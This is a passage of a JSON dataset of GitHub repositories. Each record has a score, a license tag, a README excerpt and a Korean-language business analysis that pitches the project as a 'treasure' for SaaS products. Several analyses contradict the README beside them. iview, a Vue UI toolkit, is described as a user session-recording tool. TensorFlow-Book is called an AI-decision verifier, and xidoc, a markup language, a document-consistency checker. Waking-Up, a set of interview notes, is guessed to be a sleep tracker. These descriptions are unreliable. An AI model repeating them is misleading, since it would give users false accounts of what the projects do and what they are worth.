обновляемым контентом\n\t- [Чаты и каналы в Telegram](#чаты-и-каналы-в-telegram)\n\t- [Youtube каналы](#youtube-каналы)\n\t- [Сайты, форумы и wi","composite_score":0.4642,"license_safety_tag":"unknown"},{"name":"Bilibili/ijkplayer","github_url":"https://github.com/Bilibili/ijkplayer","stars":30,"language":"C","license":"gpl-2.0","abandonment_months":22,"description":"# ijkplayer 상용화 분석\n\n## 왜 보물인가\n스마트폰이나 태블릿에서 영상을 부드럽게 재생하는 기술로, 유튜브 같은 동영상 서비스들이 필요로 하는 핵심 엔진입니다.\n\n## 어디에 쓸 수 있나\n1. **동영상 스트리밍 SaaS**: 넷플릭스나 유튜브 같은 영상 플랫폼에 통합하여 안정적인 재생 경험 제공\n2. **기업용 내부 도구**: 회사 교육용 영상","readme_excerpt":"# ijkplayer\n\n Platform | Build Status\n -------- | ------------\n Android | [![Build Status](https://travis-ci.org/Bilibili/ci-ijk-ffmpeg-android.svg?branch=master)](https://travis-ci.org/Bilibili/ci-ijk-ffmpeg-android)\n iOS | [![Build Status](https://travis-ci.org/Bilibili/ci-ijk-ffmpeg-ios.svg?branch=master)](https://travis-ci.org/Bilibili/ci-ijk-ffmpeg-ios)\n\nVideo player based on [ffplay](http://ffmpeg.org)\n\n### Download\n\n- Android:\n - Gradle\n```\n# required\nallprojects {\n    repositories {\n        jcenter()\n    }\n}\n\ndependencies {\n    # required, enough for most devices.\n    compile 'tv.danmaku.ijk.media:ijkplayer-java:0.8.8'\n    compile 'tv.danmaku.ijk.media:ijkplayer-armv7a:0.8.8'\n\n    # Other ABIs: optional\n    compile 'tv.danmaku.ijk.media:ijkplayer-armv5:0.8.8'\n    compile 'tv.danmaku.ijk.media:ijkplayer-arm64:0.8.8'\n    compile 'tv.danmaku.ijk.media:ijkplayer-x86:0.8.8'\n    compile 'tv.danmaku.ijk.media:ijkplayer-x86_64:0.8.8'\n\n    # ExoPlayer as IMediaPlayer: optional, experime","composite_score":0.4642,"license_safety_tag":"restricted"},{"name":"oaiwen/BeraChainTools","github_url":"https://github.com/oaiwen/BeraChainTools","stars":19,"language":"Python","license":"GPL-3.0","abandonment_months":15,"description":"","readme_excerpt":"","composite_score":0.4642,"license_safety_tag":"restricted"},{"name":"Unknwon/the-way-to-go_ZH_CN","github_url":"https://github.com/Unknwon/the-way-to-go_ZH_CN","stars":9,"language":"Go","license":"unknown","abandonment_months":22,"description":"# Unknown/the-way-to-go_ZH_CN 분석\n\n## 왜 보물인가\nGo 프로그래밍 언어를 중국어로 배울 수 있는 종합 교육 자료로, 빠르게 성장하는 Go 개발자 커뮤니티에서 중국 시장의 학습 수요를 충족할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유료 강좌로 변환하여 중국/대만 개발자 대상 구독형 학습 서비스 ","readme_excerpt":"《Go入门指南》\r\n===================\r\n\r\n在接触 Go 语言之后，对这门编程语言非常着迷，期间也陆陆续续开始一些帮助国内编程爱好者了解和发展 Go 语言的工作，比如开始录制视频教程[《Go编程基础》](https://github.com/Unknwon/go-fundamental-programming)。但由于目前国内并没有比较好的 Go 语言书籍，而国外的优秀书籍因为英文的缘故在一定程度上也为不少 Go 语言爱好者带来了一些学习上的困扰，不仅为了加快扩散 Go 爱好者的国内群体，本人在完成阅读这本名叫 《The Way to Go》 之后，决定每天抽出一点时间来进行翻译的工作，并且以开源的形式免费分享给有需要的 Go 语言爱好者。\r\n\r\n尽管该书对目前 Go 语言版本来说有小部分内容相对过时，但是为当下不可多得的好书，相关内容已获得作者同意根据当前 Go 语言版本进行修改而不作出特别声明。\r\n\r\n该翻译版本已获得原作者（Ivo Balbaert）本人授权，并表示支持开源事业的发展！\r\n\r\n## 翻译进度\r\n\r\n19.10 [总结和增强](eBook/19.10.md)\r\n\r\n## 支持本书\r\n\r\n如果你喜欢本书 《Go入门指南》，你可以参与到本书的翻译或纠正工作中来，具体请联系【无闻 E-mail：u#gogs.io】，一同完善本书并帮助壮大 Go 语言在国内的学习群体，给大家提供更好的学习资源。\r\n\r\n## 交流社区\r\n\r\n参见 [Go 语言学习资料与社区索引](https://github.com/Unknwon/go-study-index)。\r\n\r\n关注 Go 语言中文网公众号学习 Go\r\n\r\n![](studygolang-qrcode.jpg)\r\n\r\n### 新人守则\r\n\r\n- 2012 年 3 月 28 日以前的博文中的内容基本过时，不要再看\r\n- 符合等式 ***百度+思考+失败+翻墙+谷歌+尝试=解决*** 的问题最好不要发问\r\n\r\n## 致谢\r\n\r\n- 本书原作者：Ivo Balbaert\r\n- 参与翻译人员：\r\n\t- [@zhanming](https://github.com/zhanming)\r\n\t- themorecolor\r\n\t- [@everyx](https://github.com/everyx)\r","composite_score":0.4638,"license_safety_tag":"unknown"},{"name":"cod3rcursos/web-moderno","github_url":"https://github.com/cod3rcursos/web-moderno","stars":5,"language":"HTML","license":"unknown","abandonment_months":20,"description":"# cod3rcursos/web-moderno 분석\n\n## 왜 보물인가\n최신 웹 개발 기술을 배우고 싶은 사람들을 위해 실제 프로젝트 기반으로 정리된 완성도 높은 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 웹 개발 초보자를 위한 구조화된 강좌 패키지로 판매\n- **기업 직원 교육**: IT 부서가 신입사원 온보딩 시 활용할","readme_excerpt":"# Web Moderno com JavaScript 2020 COMPLETO + Projetos\n\nPara mais informações acessar https://www.cod3r.com.br/courses/web-moderno","composite_score":0.4635,"license_safety_tag":"unknown"},{"name":"sonarwhal/sonarwhal","github_url":"https://github.com/sonarwhal/sonarwhal","stars":5,"language":"TypeScript","license":"Apache-2.0","abandonment_months":19,"description":"# Sonarwhal 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 접근성과 성능 문제를 자동으로 찾아내는 검사 도구로, 기업들이 고객 경험을 개선하는 데 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 개발사 대상 SaaS 서비스**\n웹사이트를 만드는 회사들이 월 구독으로 자신들의 고객 사이트를 정기적으로 검사하고 리포트를 제공받는 서비스\n","readme_excerpt":"# webhint\n\n[![Build Status](https://dev.azure.com/webhint/webhint/_apis/build/status/webhintio.hint?branchName=main)](https://dev.azure.com/webhint/webhint/_build/latest?definitionId=3&branchName=main)\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/webhintio/Lobby)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fwebhintio%2Fhint.svg?type=shield)](https://app.fossa.io/projects/git%2Bgithub.com%2Fwebhintio%2Fhint?ref=badge_shield)\n\n## Quick start user guide\n\nwebhint is a customizable linting tool that helps you improve your site's\naccessibility, speed, cross-browser compatibility, and more by checking your\ncode for best practices and common errors.\n\nIt can be run from the command line (CLI), via a [browser extension][], and as\na [VS Code extension][].\n\nTo use it from the CLI you will need to install [`Node.js`][node]\n(v14.x or later) on your machine, and you can use [`npx`][npx] to test it.\n\n### Testing with `npx`\n\nRun the following command:","composite_score":0.4635,"license_safety_tag":"safe"},{"name":"milisims/nvim-luaref","github_url":"https://github.com/milisims/nvim-luaref","stars":33,"language":"Vim script","license":"MIT","abandonment_months":23,"description":"# nvim-luaref 상품화 분석\n\n## 왜 보물인가\n텍스트 편집기 사용자들이 프로그래밍 언어 문법을 빠르게 찾아볼 수 있는 도움말 도구로, 개발자의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 프로그래밍 학습자들을 위해 실시간 문법 검색 기능이 내장된 온라인 강의실 제공\n2. **기업 개발팀 협업 도구","readme_excerpt":"This 'plugin' simply adds a reference for builtin lua functions, extracting both text and formatting from [the Lua 5.1 Reference Manual](https://www.lua.org/manual/5.1/manual.html). There are still formatting issues (particularly around equals), please search through and then submit an issue if you find one that is unreported!\n\nText referring to implementing lua into a host C program has largely been removed.\n\nFor example,\n``` vim\n    :help lua_reference_toc\n    :help math.pi\n    :help coroutine.yield\n```\n\nScript generated documentation for lua 5.1 in languages: `en`, `de`, `es`, and `pt`.\n","composite_score":0.4632,"license_safety_tag":"safe"},{"name":"iview/iview","github_url":"https://github.com/iview/iview","stars":19,"language":"Vue","license":"NOASSERTION","abandonment_months":29,"description":"# iview/iview 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱의 사용자 화면을 자동으로 녹화하고 분석해주는 도구로, 고객이 실제로 어떻게 서비스를 이용하는지 직관적으로 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 업무 도구(프로젝트 관리, 회계 소프트웨어)에서 사용자가 어느 기능을 자주 사용하는지 추적\n- *","readme_excerpt":"<p align=\"center\">\n    <a href=\"http://iview.talkingdata.com/\">\n        <img width=\"200\" src=\"https://file.iviewui.com/logo-new.svg\">\n    </a>\n</p>\n\n<h1>\niView\n    <h3>A high quality UI Toolkit built on Vue.js.</h3>\n</h1>\n\n[![](https://img.shields.io/travis/iview/iview.svg?style=flat-square)](https://travis-ci.org/iview/iview)\n[![iView](https://img.shields.io/npm/v/iview.svg?style=flat-square)](https://www.npmjs.org/package/iview)\n[![NPM downloads](http://img.shields.io/npm/dm/iview.svg?style=flat-square)](https://npmjs.org/package/iview)\n[![NPM downloads](https://img.shields.io/npm/dt/iview.svg?style=flat-square)](https://npmjs.org/package/iview)\n![JS gzip size](http://img.badgesize.io/https://unpkg.com/iview/dist/iview.min.js?compression=gzip&label=gzip%20size:%20JS&style=flat-square)\n![CSS gzip size](http://img.badgesize.io/https://unpkg.com/iview/dist/styles/iview.css?compression=gzip&label=gzip%20size:%20CSS&style=flat-square)\n[![Join the chat at https://gitter.im/iview/iview](htt","composite_score":0.4631,"license_safety_tag":"unknown"},{"name":"fossasia/loklak_EmojiTracker","github_url":"https://github.com/fossasia/loklak_EmojiTracker","stars":12,"language":"Vue","license":"Apache-2.0","abandonment_months":22,"description":"# fossasia/loklak_EmojiTracker 분석\n\n## 왜 보물인가\n소셜 미디어에서 사람들이 어떤 이모지를 가장 많이 사용하는지 실시간으로 추적하고 분석하는 도구로, 마케팅과 트렌드 연구에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마케팅 대행사가 고객사에게 제공하는 소셜 미디어 트렌드 분석 플랫폼\n2.","readme_excerpt":"# Open Event Check-In\n\n[![Netlify Status](https://api.netlify.com/api/v1/badges/7456234f-3254-4395-8cd8-67979322e555/deploy-status)](https://app.netlify.com/sites/open-event-checkin/deploys)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/3583a71b83d94d388e1d8dd087f2b861)](https://app.codacy.com/gh/fossasia/open-event-checkin/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade)\n[![Gitter](https://img.shields.io/badge/chat-on%20gitter-ff006f.svg?style=flat-square)](https://gitter.im/fossasia/open-event-frontend)\n[![Mailing](https://img.shields.io/badge/Mailing-List-red.svg)](https://groups.google.com/forum/#!forum/open-event)\n[![Twitter Follow](https://img.shields.io/twitter/follow/eventyay.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/eventyay)\n\n## Communication\nPlease join our [mailing list](https://groups.google.com/forum/#!forum/open-event) or [chat channel](https://gitter.im/fossasia/open-event-fronten","composite_score":0.4629,"license_safety_tag":"safe"},{"name":"yabwe/medium-editor","github_url":"https://github.com/yabwe/medium-editor","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":19,"description":"# yabwe/medium-editor 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 직접 텍스트를 예쁘게 꾸며 쓸 수 있는 기능을 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **블로그 플랫폼**: 개인 블로거나 기업이 글을 작성할 때 굵게, 기울임, 색상 등을 쉽게 적용하는 SaaS 서비스\n2. **이메일 마케팅 도구**: 회사에서 고객에게","readme_excerpt":"﻿![medium-editor needs help!](https://user-images.githubusercontent.com/2444240/56086015-c42e3000-5e1b-11e9-9692-b97816f67712.png)\n\nIf you would be interested in helping to maintain one of the most successful WYSIWYG text editors on github, let us know!  (See issue [#1503](https://github.com/yabwe/medium-editor/issues/1503))\n\n# MediumEditor\n\nThis is a clone of [medium.com](https://medium.com) inline editor toolbar.\n\nMediumEditor has been written using vanilla JavaScript, no additional frameworks required.\n\n[![screenshot](https://raw.github.com/yabwe/medium-editor/master/demo/img/medium-editor.jpg)](http://yabwe.github.io/medium-editor/)\n\n[![Join the chat at https://gitter.im/yabwe/medium-editor](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/yabwe/medium-editor?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## Browser Support\n\n[![Saucelabs Build Status](https://saucelabs.com/browser-matrix/mediumeditor.svg)](https://saucelabs.com/beta/dashboar","composite_score":0.4629,"license_safety_tag":"unknown"},{"name":"SamuelSchmidgall/AgentLaboratory","github_url":"https://github.com/SamuelSchmidgall/AgentLaboratory","stars":5659,"language":"Python","license":"MIT","abandonment_months":9,"description":"","readme_excerpt":"","composite_score":0.4624,"license_safety_tag":"safe"},{"name":"krishnap25/mauve","github_url":"https://github.com/krishnap25/mauve","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":23,"description":"# krishnap25/mauve 분석 보고서\n\n## 왜 보물인가\n사람이 쓴 텍스트와 AI가 생성한 텍스트를 구분하는 기술로, 점점 증가하는 AI 위조 콘텐츠 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육 플랫폼 서비스**: 학생 과제 제출 시 AI 표절 여부를 자동 검사하는 기능\n2. **콘텐츠 검증 API**: 언론사나 출판사가","readme_excerpt":"# MAUVE\n\nThis is a library built on PyTorch and HuggingFace Transformers to measure the gap between neural text and human text\nwith the MAUVE measure, \nintroduced  in [this NeurIPS 2021 paper](https://arxiv.org/pdf/2102.01454.pdf) (Outstanding Paper Award) and [this JMLR 2023 paper](https://arxiv.org/pdf/2212.14578.pdf).\n\n\nMAUVE is a measure of the gap between neural text and human text. It is computed using the Kullback–Leibler (KL) divergences between the two text distributions in a quantized embedding space of a large language model. MAUVE can identify differences in quality arising from model sizes and decoding algorithms.\n\n### [Documentation Link](https://krishnap25.github.io/mauve/)\n\n### _New: MAUVE is available via [HuggingFace Evaluate](https://huggingface.co/spaces/evaluate-metric/mauve)!_\n\n\n**Features**:\n- MAUVE with quantization using *k*-means. \n- Adaptive selection of *k*-means hyperparameters. \n- Compute MAUVE using pre-computed GPT-2 features (i.e., terminal hidden state","composite_score":0.4623,"license_safety_tag":"unknown"},{"name":"diveintodeeplearning/d2l-en","github_url":"https://github.com/diveintodeeplearning/d2l-en","stars":13,"language":"Python","license":"NOASSERTION","abandonment_months":22,"description":"# diveintodeeplearning/d2l-en 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶은 사람들을 위한 무료 교과서로, 복잡한 기술을 누구나 이해할 수 있도록 설명하고 실제 코드 예제를 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육 플랫폼 (SaaS)**: 온라인 강의 사이트가 이 자료를 기반으로 AI 입문 강좌를 만들어 월 구독료 받","readme_excerpt":"<div align=\"left\">\n  <img src=\"https://raw.githubusercontent.com/d2l-ai/d2l-en/master/static/logo-with-text.png\" width=\"350\">\n</div>\n\n# D2L.ai: Interactive Deep Learning Book with Multi-Framework Code, Math, and Discussions\n\n[![Continuous Integration](https://github.com/d2l-ai/d2l-en/actions/workflows/ci.yml/badge.svg)](https://github.com/d2l-ai/d2l-en/actions/workflows/ci.yml)\n\n[Book website](https://d2l.ai/) | [STAT 157 Course at UC Berkeley](http://courses.d2l.ai/berkeley-stat-157/index.html)\n\n<h5 align=\"center\"><i>The best way to understand deep learning is learning by doing.</i></h5>\n\n<p align=\"center\">\n  <img width=\"200\"  src=\"static/frontpage/_images/eq.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/figure.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/code.jpg\">\n  <img width=\"200\"  src=\"static/frontpage/_images/notebook.gif\">\n</p>\n\nThis open-source book represents our attempt to make deep learning approachable, teaching you the concepts, the context, and the c","composite_score":0.4622,"license_safety_tag":"unknown"},{"name":"alexaorrico/AirBnB_clone_v2","github_url":"https://github.com/alexaorrico/AirBnB_clone_v2","stars":113,"language":"Python","license":"NOASSERTION","abandonment_months":21,"description":"","readme_excerpt":"","composite_score":0.4622,"license_safety_tag":"unknown"},{"name":"adrianhajdin/project_mern_memories","github_url":"https://github.com/adrianhajdin/project_mern_memories","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":19,"description":"# project_mern_memories 분석\n\n## 왜 보물인가\n개인의 추억과 사진을 온라인에 저장하고 정리할 수 있는 완성도 높은 웹 애플리케이션으로, 누구나 쉽게 자신만의 추억 저장소를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개인 추억 공유 SaaS**: 사용자가 월 구독으로 무제한 추억(사진/글)을 저장하고 가족·친구와 공유하는 ","readme_excerpt":"# Memories\r\n\r\n![Memories](https://i.ibb.co/Z8Y0CJv/Screenshot-2020-10-30-at-11-10-04.png)\r\n\r\n## Introduction\r\nThis is a code repository for the corresponding video tutorial - https://youtube.com/playlist?list=PL6QREj8te1P7VSwhrMf3D3Xt4V6_SRkhu.\r\n\r\nUsing React, Node.js, Express & MongoDB you'll learn how to build a Full Stack MERN Application - from start to finish. The App is called \"Memories\" and it is a simple social media app that allows users to post interesting events that happened in their lives.\r\n\r\nBy the end of this video, you will have a strong understanding of how the MERN Stack works.\r\n\r\n### [🌟 Become a top 1% Next.js 15 developer in only one course](https://jsmastery.pro/next15)\r\n### [🚀 Land your dream programming job in 6 months](https://jsmastery.pro/masterclass)\r\n\r\nSetup:\r\n- run ```npm i && npm start``` for both client and server side to start the app\r\n","composite_score":0.4622,"license_safety_tag":"unknown"},{"name":"ajayns/react-projects","github_url":"https://github.com/ajayns/react-projects","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":21,"description":"# ajayns/react-projects 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱을 만드는 데 필요한 반복 가능한 기초 부품(컴포넌트)들을 모아놓은 저장소로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 관리 화면(대시보드)을 빠르게 구축하는 데 사용\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"# React Projects\n\n(not maintained, was just for practice earlier)\nA couple of projects to get familiar with the React framework.\n\n![Giphy](https://media.giphy.com/media/l0HUhhAtb86vYAHkY/giphy.gif)\n![Giphy](https://media.giphy.com/media/26gN147Cy7zF1Mv7y/giphy.gif)\n![Giphy](https://media.giphy.com/media/26DNeo2xDmfj3plbW/giphy.gif)\n\n\n## Projects\n1. **todo**: Basic todo app to get started.\n2. **tictactoe**: A tic-tac-toe game uses states and props.\n3. **markdown-editor**: A real-time markdown editor SPA. [(Live Demo)](https://react-markdown-editor.firebaseapp.com)\n4. **basic-react-redux**: Basic react-redux project which handles articles in its store.\n5. **basic-redux-thunk**: Basic react-redux-thunk project which handles items from an API using thunk, uses redux for store.\n6. **book-store [WIP]**: Online book store built over react-redux and Bootstrap for UI.\n7. **trip-mate**: Manage and keep track of your trips with this simple, smooth webapp. Uses react-router, custom styling. [(Live","composite_score":0.4613,"license_safety_tag":"unknown"},{"name":"IronyProject/Irony","github_url":"https://github.com/IronyProject/Irony","stars":6,"language":"C#","license":"MIT","abandonment_months":21,"description":"# Irony Project 분석\n\n## 왜 보물인가\n프로그래밍 언어를 만드는 데 필요한 기초 도구를 제공하여, 새로운 소프트웨어 언어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 업무용 맞춤 프로그래밍 언어를 클라우드에서 제공하는 서비스\n2. **내부 업무 도구**: 대형 기업이 자사 직원용으로 간","readme_excerpt":"# Irony — .NET Language Implementation Kit\nhttps://github.com/IronyProject/Irony\n\n[![Github Actions](https://github.com/IronyProject/Irony/actions/workflows/build.yml/badge.svg)](https://github.com/IronyProject/Irony/actions/workflows/build.yml)\n[![Nuget](https://img.shields.io/nuget/v/Irony.svg)](https://www.nuget.org/packages/Irony)\n\n### Prerequisites\n  \n* OS: Windows 7;\n* Visual Studio 2017, .NET Framework 4.0, 4.5 or .NET Standard 2.0\n\n### Demo instructions\n\nTo run Grammar Explorer\n\n* Open Irony.sln solution file in Visual Studio.\n* Right-click on the project \"030.Irony.GrammarExplorer\" and select \"Set as StartUp project\" from context menu.\n* Click Run button on toolbar (F5). Grammar Explorer Window opens.\n* !!!Important: if you are launching the Grammar Explorer for the first time after downloading Irony and\n    if you see that Grammars combobox is not empty, then make sure you clear it: click the button\n    next to the combobox and select \"Remove all\"\n* If Grammars combobox on to","composite_score":0.4611,"license_safety_tag":"safe"},{"name":"xigoi/xidoc","github_url":"https://github.com/xigoi/xidoc","stars":6,"language":"C","license":"GPL-3.0","abandonment_months":16,"description":"# xigoi/xidoc 상용화 분석\n\n## 왜 보물인가\n사용자가 작성한 콘텐츠의 일관성 문제를 자동으로 찾아주는 도구로, 기업의 문서 품질 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 문서 검수 SaaS**\n- 대기업과 중견기업이 월간 구독으로 이용하는 자동 검수 플랫폼\n- 인사, 마케팅, 법무팀의 문서 일관성을 실시간","readme_excerpt":"# xidoc\n\n[![builds.sr.ht status](https://builds.sr.ht/~xigoi/xidoc.svg)](https://builds.sr.ht/~xigoi/xidoc?)\n\n**xidoc** is a consistent markup language. See [the homepage](https://xidoc.nim.town/) for more information.\n\n## I'm Using GitHub Under Protest\n\nThis project is currently hosted on GitHub. This is not ideal; GitHub is a proprietary, trade-secret system that is not Free and Open Source Software (FOSS). I am deeply concerned about using a proprietary system like GitHub to develop my FOSS project. I urge you to read about the [Give up GitHub](https://GiveUpGitHub.org) campaign from [the Software Freedom Conservancy](https://sfconservancy.org) to understand some of the reasons why GitHub is not a good place to host FOSS projects.\n\nIf you want to contribute to this project, please consider doing so on [SourceHut](https://sr.ht/~xigoi/xidoc/) instead.\n\nAny use of this project's code by GitHub Copilot, past or present, is done without my permission. I do not consent to GitHub's use of","composite_score":0.4608,"license_safety_tag":"restricted"},{"name":"alexjoverm/v-lazy-image","github_url":"https://github.com/alexjoverm/v-lazy-image","stars":12,"language":"JavaScript","license":"MIT","abandonment_months":23,"description":"# v-lazy-image 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 이미지를 천천히 로드하여 페이지 속도를 빠르게 만드는 기술로, 사용자 경험을 개선하면서도 서버 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **이미지 많은 전자상거래 플랫폼**: 수천 개 상품 이미지를 빠르게 표시하는 온라인 쇼핑몰 서비스\n- **콘텐츠 뉴스 서비스**: ","readme_excerpt":"# v-lazy-image\n\n[![npm](https://img.shields.io/npm/v/v-lazy-image.svg)](https://www.npmjs.com/package/v-lazy-image)\n[![npm](https://img.shields.io/npm/dm/v-lazy-image.svg)](https://www.npmjs.com/package/v-lazy-image)\n[![Donate](https://img.shields.io/badge/donate-paypal-blue.svg)](https://paypal.me/AJoverMorales)\n\nA Vue.js component to lazy load an image automatically when it enters the viewport using the [Intersection Observer API](https://developer.mozilla.org/docs/Web/API/Intersection_Observer_API).\n\n> ⚠️ Check the **[practical examples and demos](https://vuedose.tips/lazy-loading-images-with-v-lazy-image)** if you are creating a real-world or enterprise project and see how to **achieve max performance** using responsive images and progressive image loading.\n\n## Usage\n\n```bash\nnpm install v-lazy-image\n```\n\n_**Warning:** You'll need to install the [w3c Intersection Observer polyfill](https://github.com/w3c/IntersectionObserver/tree/master/polyfill) in case you're targeting a browser ","composite_score":0.4606,"license_safety_tag":"safe"},{"name":"wolverinn/Waking-Up","github_url":"https://github.com/wolverinn/Waking-Up","stars":9,"language":"","license":"GPL-3.0","abandonment_months":19,"description":"# Waking-Up 저장소 분석\n\n## 왜 보물인가\n프로젝트명과 최근 활발한 개발(2024년 10월) 활동으로 보아 수면/웰니스 관련 혁신적인 도구로 보이나, 저장소 설명이 없어 정확한 가치 판단이 어렵습니다.\n\n## 어디에 쓸 수 있나\n1. **수면 추적 SaaS**: 사용자의 수면 패턴을 분석하고 개선 방안을 제시하는 월 구독 서비스로 운영\n2. **","readme_excerpt":"# Waking-Up\n\n> 大多数人都高估了他们一天能做的事情，但低估了他们一年能做的事情\n\n<div align=\"center\">\n<img src=\"https://upload-images.jianshu.io/upload_images/10634927-dc42fd1c3c32b515.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240\" src=\"_v_images/20191229112508482_31766.png\"></img>\n</div>\n\n这是我用来准备后端开发校招面试的一个笔记本。按照计算机基础知识的不同版块，记录了面试中常见的问题以及比较规范的答案，大部分问题都带有更加细节的知识点追问。我用它来收集整理自己遇到的一些面试题，并且在面试前回顾。\n\n<div align=\"center\">\n\n| &nbsp;&nbsp;&nbsp;计算机网络&nbsp;&nbsp;&nbsp; | &nbsp;&nbsp;&nbsp;操作系统&nbsp;&nbsp;&nbsp; | &nbsp;&nbsp;&nbsp;&nbsp;数据库&nbsp;&nbsp;&nbsp;&nbsp; | &nbsp;&nbsp;&nbsp;设计模式&nbsp;&nbsp;&nbsp; | &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;工具&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; | &nbsp;&nbsp;&nbsp;&nbsp;Python&nbsp;&nbsp;&nbsp;&nbsp; |    &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;面经&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;    |\n| :----------------------------------------: | :--------------------------------------------------: | :-------------------------------------------------------------: | :--------------------------------------------------: | :-","composite_score":0.4599,"license_safety_tag":"restricted"},{"name":"olafhartong/sysmon-modular","github_url":"https://github.com/olafhartong/sysmon-modular","stars":6,"language":"PowerShell","license":"MIT","abandonment_months":21,"description":"# sysmon-modular 분석 리포트\n\n## 왜 보물인가\n컴퓨터 보안 담당자들이 악성 활동을 탐지하기 위해 사용하는 '시스몬'이라는 감시 도구를 더 쉽고 효율적으로 사용할 수 있도록 정리한 표준 설정 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 모니터링 SaaS**: 기업의 컴퓨터를 24시간 감시하는 클라우드 서비스에 이 설정을 탑재하여","readme_excerpt":"# sysmon-modular | A Sysmon configuration repository for everybody to customise\r\n\r\n[![license](https://img.shields.io/github/license/olafhartong/sysmon-modular.svg?style=flat-square)](https://github.com/olafhartong/sysmon-modular/blob/master/license.md)\r\n![Maintenance](https://img.shields.io/maintenance/yes/2023.svg?style=flat-square)\r\n[![GitHub last commit](https://img.shields.io/github/last-commit/olafhartong/sysmon-modular.svg?style=flat-square)](https://github.com/olafhartong/sysmon-modular/commit/master)\r\n![Build Sysmon config with all modules](https://github.com/olafhartong/sysmon-modular/workflows/Build%20Sysmon%20config%20with%20all%20modules/badge.svg)\r\n[![Twitter](https://img.shields.io/twitter/follow/olafhartong.svg?style=social&label=Follow)](https://twitter.com/olafhartong)\r\n[![Discord Shield](https://discordapp.com/api/guilds/715302469751668787/widget.png?style=shield)](https://discord.gg/B5n6skNTwy)\r\n\r\nThis is a Microsoft Sysinternals Sysmon [download here](https://docs.","composite_score":0.4594,"license_safety_tag":"safe"},{"name":"BinRoot/TensorFlow-Book","github_url":"https://github.com/BinRoot/TensorFlow-Book","stars":10,"language":"Jupyter Notebook","license":"mit","abandonment_months":39,"description":"# BinRoot/TensorFlow-Book 상업화 분석\n\n## 왜 보물인가\n인공지능이 내린 결정이 맞는지 자동으로 검증하는 기술로, AI 시스템의 신뢰도를 높이려는 기업들이 절실히 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **의료 AI 검진 서비스**: 의사 진단을 AI가 보조할 때 AI 판단이 맞는지 자동 검증하여 오진 방지\n2. **금융 대출","readme_excerpt":"# [Machine Learning with TensorFlow](http://www.tensorflowbook.com/)\n\n[This](https://github.com/BinRoot/TensorFlow-Book) is the official code repository for [Machine Learning with TensorFlow](http://www.tensorflowbook.com/).\n\nGet started with machine learning using TensorFlow, Google's latest and greatest machine learning library.\n\n# Summary\n\n## [Chapter 2](https://github.com/BinRoot/TensorFlow-Book/tree/master/ch02_basics) - TensorFlow Basics\n\n- **Concept 1**: Defining tensors\n- **Concept 2**: Evaluating ops\n- **Concept 3**: Interactive session\n- **Concept 4**: Session loggings\n- **Concept 5**: Variables\n- **Concept 6**: Saving variables\n- **Concept 7**: Loading variables\n- **Concept 8**: TensorBoard\n\n## [Chapter 3](https://github.com/BinRoot/TensorFlow-Book/tree/master/ch03_regression) - Regression\n\n- **Concept 1**: Linear regression\n- **Concept 2**: Polynomial regression\n- **Concept 3**: Regularization\n\n## [Chapter 4](https://github.com/BinRoot/TensorFlow-Book/tree/master/ch04_class","composite_score":0.4589,"license_safety_tag":"safe"},{"name":"abhshkdz/ai-deadlines","github_url":"https://github.com/abhshkdz/ai-deadlines","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":21,"description":"# ai-deadlines 저장소 분석\n\n## 왜 보물인가\n인공지능 학술대회와 논문 모집 마감일을 한 곳에 모아 추적할 수 있는 서비스로, 연구자들이 투고 기회를 놓치지 않도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **학술 커뮤니티 SaaS**: 마감일 알림과 필터링 기능을 제공하는 웹 서비스로 월 구독료 수집\n2. **대학 내부 도구**: 대학원생과","readme_excerpt":"## AI Deadlines [![Build Status](https://travis-ci.com/abhshkdz/ai-deadlines.svg?branch=gh-pages)](https://travis-ci.com/abhshkdz/ai-deadlines)\n\nCountdown 